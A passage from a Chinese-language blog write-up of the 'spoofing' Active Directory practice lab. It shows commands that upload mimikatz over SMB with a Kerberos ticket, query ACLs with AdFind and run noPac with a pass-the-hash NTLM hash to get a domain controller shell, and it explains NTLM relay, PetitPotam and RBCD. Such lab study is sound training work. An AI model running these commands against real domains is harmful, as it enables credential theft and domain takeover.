<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">KRB5CCNAME=/home/fault/Desktop/impacket-0.11.0/examples/administrator.ccache proxychains4 python3 smbclient.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26</span><br><span class="line"></span><br><span class="line">use C$</span><br><span class="line">cd \windows\temp</span><br><span class="line">put mimikatz.exe #确保mimikatz的路径是对的，我的mimikatz是在当前目录的</span><br></pre></td></tr></table></figure>
<p>然后我们尝试在win中运行mimikatz来抓hash<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081819480.png" alt="image.png" loading="lazy"><br>
至于这里为什么抓到的是zhanghui的可以用，是因为使用ADfind工具查找之后发现他在MA_Admin组，对computer可以创建对象或是向域中添加机器账户，所以可以打通nopac(其实题目考点也说了最后考nopac)<br>
然后我们</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AdFind.exe -b &quot;CN=Computers,DC=xiaorang,DC=lab&quot; nTSecurityDescriptor -sddl+++</span><br></pre></td></tr></table></figure>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains4 python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6 -shell </span><br></pre></td></tr></table></figure>
<p><img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081915363.png" alt="image.png" loading="lazy"><br>
就拿到了最后一个flag</p>
<h2 id="域中知识总结"><a class="headerlink" href="#域中知识总结"></a>域中知识总结</h2>
<h3 id="NTLM-Relay"><a class="headerlink" href="#NTLM-Relay"></a>NTLM-Relay</h3>
<p>结合名字我们也能知道它是NTLM中继攻击，也就是强制目标服务器或者用户使用LM HASH/NTLM HASH对攻击者的服务器进行认证，然后把这个认证中继到其它服务器中从而进行横向</p>
<h3 id="NTLM-Relay强制认证方式"><a class="headerlink" href="#NTLM-Relay强制认证方式"></a>NTLM-Relay强制认证方式</h3>
<p>参考这篇文章<br>
<a target="_blank" rel="noopener" href="https://forum.butian.net/share/1944">https://forum.butian.net/share/1944</a><br>
我们这里用到的是PeitiPotam<br>
<a target="_blank" rel="noopener" href="https://github.com/topotam/PetitPotam">https://github.com/topotam/PetitPotam</a><br>
用到的是这个工具</p>
<h3 id="为什么不能直接搞DC"><a class="headerlink" href="#为什么不能直接搞DC"></a>为什么不能直接搞DC</h3>
<p>因为目前只发现这一个用户，而且MAQ=0，MAQ就是域中允许计算器账户的数量限制，如果设置为0，那么就没有办法往域中添加计算机账户，impacket的addcomputer有两种方法<br>
<img src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/202411081930310.png" alt="image.png" loading="lazy"><br>
samr受到MAQ=0的限制，ldaps因为没有TLS，所以都用不了<br>
域控存在nopac，但是当前用户对域内没有creatchild的ACL,而且甚至对当前机器没有WriteDacl权限，那么就没有办法修改SanAccountName，这个可以参考这篇文章<br>
<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/9997?time__1311=n4%2BxnD0DuDRDcGiGCCD%2Fia4BKPxxj22rTMkdTD#toc-10">https://xz.aliyun.com/t/9997?time__1311=n4%2BxnD0DuDRDcGiGCCD%2Fia4BKPxxj22rTMkdTD#toc-10</a></p>
<h3 id="RBCD攻击"><a class="headerlink" href="#RBCD攻击"></a>RBCD攻击</h3>
<p>建议学习这篇文章<br>
<a target="_blank" rel="noopener" href="https://blog.csdn.net/huohaowen/article/details/139206002">https://blog.csdn.net/huohaowen/article/details/139206002</a></p>
</article><div class="post-copyright"><div class="post-copyright__author_group"><a class="post-copyright__author_img" href="/about/"><img class="post-copyright__author_img_front" src= "/img/loading.avif" data-lazy-src="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4"></a><div class="post-copyright__author_name">fault`s blog</div><div class="post-copyright__author_desc"></div></div><div class="post-tools" id="post-tools"><div class="post-tools-left"><div id="quit-box" onclick="RemoveRewardMask()"></div></div></div><div class="post-copyright__notice"><span class="post-copyright-info">本文是原创文章，采用<a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>协议，完整转载请注明来自<a href="/">fault`s blog</a></span></div></div><div class="post-tools-right"><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><span class="tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>渗透测试<span class="tagsPageCount">4</span></span></a><a class="post-meta__tags" href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/"><span class="tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>春秋云境<span class="tagsPageCount">3</span></span></a><a class="post-meta__tags" href="/tags/%E5%9F%9F%E7%9B%B8%E5%85%B3/"><span class="tags-punctuation"><i class="solitude fa-solid fa-hashtag"></i>域相关<span class="tagsPageCount">4</span></span></a></div></div></div><nav class="needEndHide pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2024/11/13/4T$CTF-%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">4T$CTF-赛后复现</div></div></a></div><div class="next-post pull-right"><a href="/2024/10/16/FastJson-1.2.24%E7%89%88%E6%9C%AC%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">FastJson-1.2.24版本漏洞分析</div></div></a></div></nav>
        <div class="relatedPosts">
            <div class="headline">
                <i class="solitude fa-solid fa-star"></i>
                <span>喜欢这篇的人也看了</span>
                <div class="relatedPosts-link">
                    <a onclick="event.preventDefault(); toRandomPost();" href="javascript:void(0);" rel="external nofollow" data-pjax-state="">随便逛逛</a>
                </div>
            </div>
            <div class="relatedPosts-list">
            <div>
                <a href="/2024/09/16/Tsclient/" title="春秋云境-Tsclient">
                    <img class="cover" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.cn/i/pc/img561.webp" alt="cover">
                    <div class="content is-center">
                        <div class="title">春秋云境-Tsclient</div>
                    </div>
                </a>
            </div>
            <div>
                <a href="/2024/08/06/Initial/" title="春秋云境-Initial">
                    <img class="cover" src= "/img/loading.avif" data-lazy-src="https://fault-1315577519.cos.ap-nanjing.myqcloud.com/images/20240806102852.png" alt="cover">
                    <div class="content is-center">
                        <div class="title">春秋云境-Initial</div>
                    </div>
                </a>
            </div>
            </div>
        </div><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="solitude fa-solid fa-comment"></i><span> 评论</span><span class="count"> (<span class="valine-comment-count" data-xid="/2024/11/08/spoofing/" itemprop="commentCount"><i class="solitude fa-solid fa-spinner fa-spin"></i></span>)</span></div></div><div class="comment-wrap"><div class="vcomment" id="vcomment"></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="card-content"><div class="card-info-avatar is-center"><div class="author-info__top-group"><div class="author-info__sayhi" id="author-info__sayhi" onclick="sco.changeSayHelloText()">sayhello.morning</div></div></div><div class="avatar-img-group"><img class="avatar-img" alt="头像" src= "/img/loading.avif" data-lazy-src="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4"><div class="avatar-sticker"><img class="avatar-sticker-img" src= "/img/loading.avif" data-lazy-src="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4" alt="心情贴纸"></div></div><div class="author-info__description_group"><div class="author-info__description">fault的小天地喵</div><div class="author-info__description2">I believe you can find knowledge and tutorials here that will be useful to you.</div></div><div class="author-info__bottom-group"><a class="author-info__bottom-group-left" href="/about/"><div class="author-info__name">fault_li</div><div class="author-info__desc"></div></a><div class="card-info-social-icons is-center"><a class="social-icon" target="_blank" rel="noopener" href="https://github.com/fault123" title="Github"><i class="solitude  fab fa-github"></i></a><a class="social-icon" target="_blank" rel="noopener" href="https://space.bilibili.com/398904334" title="Bilibili"><i class="solitude  fab fa-bilibili"></i></a></div></div></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="solitude fa-solid fa-bars"></i><span>文章目录</span></div><div class="toc-content" id="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag01"><span class="toc-text">flag01</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag02"><span class="toc-text">flag02</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag03"><span class="toc-text">flag03</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag04"><span class="toc-text">flag04</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%9F%E4%B8%AD%E7%9F%A5%E8%AF%86%E6%80%BB%E7%BB%93"><span class="toc-text">域中知识总结</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NTLM-Relay"><span class="toc-text">NTLM-Relay</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NTLM-Relay%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81%E6%96%B9%E5%BC%8F"><span class="toc-text">NTLM-Relay强制认证方式</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%83%BD%E7%9B%B4%E6%8E%A5%E6%90%9EDC"><span class="toc-text">为什么不能直接搞DC</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RBCD%E6%94%BB%E5%87%BB"><span class="toc-text">RBCD攻击</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="solitude fa-solid fa-map"></i><span>最近发布</span></div><div class="aside-list"><a class="aside-list-item" href="/2024/12/31/2024%E5%B9%B4%E7%BB%88%E6%80%BB%E7%BB%93/" title="2024年终总结"><div class="thumbnail"><img alt="2024年终总结" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.com/i/pc/img587.webp"></div><div class="content"><span class="title" href="/2024/12/31/2024%E5%B9%B4%E7%BB%88%E6%80%BB%E7%BB%93/" title="2024年终总结">2024年终总结</span></div></a><a class="aside-list-item" href="/2024/11/26/2024%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%9B%98/" title="2024网鼎杯半决赛复盘"><div class="thumbnail"><img alt="2024网鼎杯半决赛复盘" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.cn/i/pc/img550.webp"></div><div class="content"><span class="title" href="/2024/11/26/2024%E7%BD%91%E9%BC%8E%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B%E5%A4%8D%E7%9B%98/" title="2024网鼎杯半决赛复盘">2024网鼎杯半决赛复盘</span></div></a><a class="aside-list-item" href="/2024/11/13/4T$CTF-%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/" title="4T$CTF-赛后复现"><div class="thumbnail"><img alt="4T$CTF-赛后复现" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.cn/i/pc/img499.webp"></div><div class="content"><span class="title" href="/2024/11/13/4T$CTF-%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%8E%B0/" title="4T$CTF-赛后复现">4T$CTF-赛后复现</span></div></a><a class="aside-list-item" href="/2024/11/08/spoofing/" title="春秋云境-spoofing"><div class="thumbnail"><img alt="春秋云境-spoofing" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.cn/i/pc/img374.webp"></div><div class="content"><span class="title" href="/2024/11/08/spoofing/" title="春秋云境-spoofing">春秋云境-spoofing</span></div></a><a class="aside-list-item" href="/2024/10/16/FastJson-1.2.24%E7%89%88%E6%9C%AC%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" title="FastJson-1.2.24版本漏洞分析"><div class="thumbnail"><img alt="FastJson-1.2.24版本漏洞分析" src= "/img/loading.avif" data-lazy-src="https://img.loliapi.cn/i/pc/img241.webp"></div><div class="content"><span class="title" href="/2024/10/16/FastJson-1.2.24%E7%89%88%E6%9C%AC%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" title="FastJson-1.2.24版本漏洞分析">FastJson-1.2.24版本漏洞分析</span></div></a></div></div></div></div></main><footer id="footer"><div id="st-footer-bar"><div class="footer-logo"><span>fault</span></div><div class="footer-bar-description">Articles from fault_li.</div><a class="footer-bar-link" href="/about/">Learn more</a></div><div id="footer-bar"><div class="footer-bar-links"><div class="footer-bar-left"><div class="copyright">© 2023 - 2025 By&nbsp;<a class="footer-bar-link" href="/"><img class="author-avatar" src= "/img/loading.avif" data-lazy-src="https://q1.qlogo.cn/g?b=qq&amp;nk=2444073573&amp;s=4">fault_li</a></div></div><div class="footer-bar-right"><a class="footer-bar-link" target="_blank" rel="noopener" href="https://github.com/everfu/hexo-theme-solitude" alt="Theme">Theme</a></div></div></div></footer></div><!-- right_menu--><div id="rightMenu"><div class="rightMenu-group rightMenu-small"><div class="rightMenu-item" id="menu-backward"><i class="solitude fa-solid fa-arrow-left"></i></div><div class="rightMenu-item" id="menu-forward"><i class="solitude fa-solid fa-arrow-right"></i></div><div class="rightMenu-item" id="menu-refresh"><i class="solitude fa-solid fa-arrows-rotate"></i></div><div class="rightMenu-item" id="menu-top"><i class="solitude fa-solid fa-arrow-up"></i></div></div><div class="rightMenu-group rightMenu-line rightMenuPlugin"><div class="rightMenu-item" id="menu-copytext"><i class="solitude fa-solid fa-clone"></i><span>复制选中文本</span></div><div class="rightMenu-item" id="menu-pastetext"><i class="solitude fa-solid fa-clipboard"></i><span>粘贴文本</span></div><div class="rightMenu-item" id="menu-commenttext"><i class="solitude fa-solid fa-comment-medical"></i><span>引用到评论</span></div><div class="rightMenu-item" id="menu-newwindow"><i class="solitude fa-regular fa-window-maximize"></i><span>新窗口打开</span></div><div class="rightMenu-item" id="menu-copylink"><i class="solitude fa-solid fa-link"></i><span>复制链接地址</span></div><div class="rightMenu-item" id="menu-copyimg"><i class="solitude fa-solid fa-clone"></i><span>复制此图片</span></div><div class="rightMenu-item" id="menu-downloadimg"><i class="solitude fa-solid fa-cloud-arrow-down"></i><span>下载此图片</span></div></div><div class="rightMenu-group rightMenu-line rightMenuOther"><div class="rightMenu-item" id="menu-darkmode" onclick="sco.switchDarkMode()"><i class="solitude fa-solid fa-circle-half-stroke"></i><span class="menu-darkmode-text">深色模式</span></div><div class="rightMenu-item" id="menu-translate"><i class="solitude fa-solid fa-language"></i><span>轉為繁體</span></div></div></div><div id="rightmenu-mask"></div><!-- inject body--><div><script src="/js/utils.js?v=2.1.11"></script><script src="/js/main.js?v=2.1.11"></script><script src="/js/third_party/waterfall.min.js?v=2.1.11"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/pjax/0.2.8/pjax.min.js"></script><script src="/js/third_party/universe.min.js?v=2.1.11"></script><script>dark()
</script><script src="/js/tw_cn.js?v=2.1.11"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/vanilla-lazyload/19.1.3/lazyload.iife.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/node-snackbar/0.1.16/snackbar.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/fancyapps-ui/5.0.36/fancybox/fancybox.umd.min.js"></script><script>var meting_api = 'https://meting.qjqq.cn/?server=:server&type=:type&id=:id&auth=:auth&r=:r';</script><script src="https://cdnjs.cloudflare.com/ajax/libs/aplayer/1.10.1/APlayer.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/meting/2.0.1/Meting.min.js"></script><script>window.paceOptions = {
  restartOnPushState: false
}

utils.addGlobalFn('pjaxSend', () => {
  Pace.restart()
}, 'pace_restart')
</script><script src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.2.4/pace.min.js"></script><script src="/js/right_menu.js?v=2.1.11"></script><div class="js-pjax"><script>(() => {
    const initValine = () => {
        const valine = new Valine({
            el: '#vcomment',
            appId: 'F9QjCm7TBr6LB35r0IAJieDQ-MdYXbMMI',
            appKey: 'sxYlPHL77ssMvSMC8a9bHzx6',
            avatar: 'https://valine.js.org/avatar.html',
            serverURLs: 'https://f9qjcm7t.api.lncldglobal.com',
            emojiMaps: {"tv_doge":"6ea59c827c414b4a2955fe79e0f6fd3dcd515e24.png","tv_亲亲":"a8111ad55953ef5e3be3327ef94eb4a39d535d06.png","tv_偷笑":"bb690d4107620f1c15cff29509db529a73aee261.png","tv_再见":"180129b8ea851044ce71caf55cc8ce44bd4a4fc8.png","tv_冷漠":"b9cbc755c2b3ee43be07ca13de84e5b699a3f101.png","tv_发怒":"34ba3cd204d5b05fec70ce08fa9fa0dd612409ff.png","tv_发财":"34db290afd2963723c6eb3c4560667db7253a21a.png","tv_可爱":"9e55fd9b500ac4b96613539f1ce2f9499e314ed9.png","tv_吐血":"09dd16a7aa59b77baa1155d47484409624470c77.png","tv_呆":"fe1179ebaa191569b0d31cecafe7a2cd1c951c9d.png","tv_呕吐":"9f996894a39e282ccf5e66856af49483f81870f3.png","tv_困":"241ee304e44c0af029adceb294399391e4737ef2.png","tv_坏笑":"1f0b87f731a671079842116e0991c91c2c88645a.png","tv_大佬":"093c1e2c490161aca397afc45573c877cdead616.png","tv_大哭":"23269aeb35f99daee28dda129676f6e9ea87934f.png","tv_委屈":"d04dba7b5465779e9755d2ab6f0a897b9b33bb77.png","tv_害羞":"a37683fb5642fa3ddfc7f4e5525fd13e42a2bdb1.png","tv_尴尬":"7cfa62dafc59798a3d3fb262d421eeeff166cfa4.png","tv_微笑":"70dc5c7b56f93eb61bddba11e28fb1d18fddcd4c.png","tv_思考":"90cf159733e558137ed20aa04d09964436f618a1.png","tv_惊吓":"0d15c7e2ee58e935adc6a7193ee042388adc22af.png"},
            path: window.location.pathname,
            visitor: true,
            ...null
        })
        GLOBAL_CONFIG.lightbox && utils.lightbox(document.querySelectorAll('#comment .vcontent img:not(.vemoji)'))
        sco.owoBig({body: '.vwrap', item: '.vemojis i'})
    }
    const loadValine = async () => {
        if (typeof Valine === 'function') setTimeout(initValine, 0)
        else {
            await utils.getScript('https://cdnjs.cloudflare.com/ajax/libs/valine/1.5.2/Valine.min.js').then(initValine)
        }
        false && barrageValine()
    }
    if ('Valine' === 'Valine' || false) {
        if (false) utils.loadComment(document.getElementById('vcomment'), loadValine)
        else loadValine()
    } else {
        window.loadTwoComment = loadValine
    }
})()
</script><script defer pjax src="https://cdnjs.cloudflare.com/ajax/libs/busuanzi/2.3.0/bsz.pure.mini.min.js"></script></div></div><!-- pjax--><script>const pjax = new Pjax({
    elements: 'a:not([target="_blank"])',
    selectors: ["title","#body-wrap","#site-config","meta[name=\"description\"]",".js-pjax","meta[property^=\"og:\"]","#config-diff",".rs_show",".rs_hide"],
    cacheBust: false,
    analytics: false,
    scrollRestoration: false
})

document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
})

document.addEventListener('pjax:complete', () => {
    window.refreshFn()

    document.querySelectorAll('script[data-pjax]').forEach(item => {
        const newScript = document.createElement('script')
        const content = item.text || item.textContent || item.innerHTML || ""
        Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
        newScript.appendChild(document.createTextNode(content))
        item.parentNode.replaceChild(newScript, item)
    })

    GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

})

document.addEventListener('pjax:error', (e) => {
    if (e.request.status === 404) {
        pjax.loadUrl('/404.html')
    }
})</script><!-- google adsense--><!-- search--><!-- Tianli-Talk--><!-- music--><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"bottom","width":300,"height":600},"mobile":{"show":false},"react":{"opacity":1},"log":false});</script></body></html>
        <script>
            const posts = ["2024/12/31/2024年终总结/","2024/11/26/2024网鼎杯半决赛复盘/","2024/11/13/4T$CTF-赛后复现/","2024/11/08/spoofing/","2024/10/16/FastJson-1.2.24版本漏洞分析/","2024/09/16/Tsclient/","2024/08/18/CCS巅峰极客wp --by 图书馆五楼风很大/","2024/08/06/Initial/","2024/08/04/关于信息泄露的一些吐槽/","2024/07/28/工坊wp-RSA2/","2024/07/26/工坊wp-RSA1/","2024/07/23/DASCTF 2024 七月赛 web Sanic's revenge&&ciscn 2024 sanic的复盘/","2024/03/21/NTLM认证学习/","2024/03/21/kerberos协议学习/","2024/03/21/2023/","2024/03/21/NSSCTF IOT题目复现/","2024/03/21/commonscollections-1/","2024/03/21/commons-collections 6/","2024/03/21/commons-collections 4/","2024/03/21/commons-collections 2/","2024/03/21/commons-collection 3/","2024/03/21/动态类加载/","2024/03/21/动态代理/","2024/03/21/URLDNS/","2024/03/21/Tomcat源码初识（tomcat流程）/","2024/02/18/EL表达式注入/","2023/01/16/fault 2022 年报/"];
            function toRandomPost() {
                const randomPost = posts[Math.floor(Math.random() * posts.length)];
                pjax.loadUrl(GLOBAL_CONFIG.root + randomPost);
            }
        </script>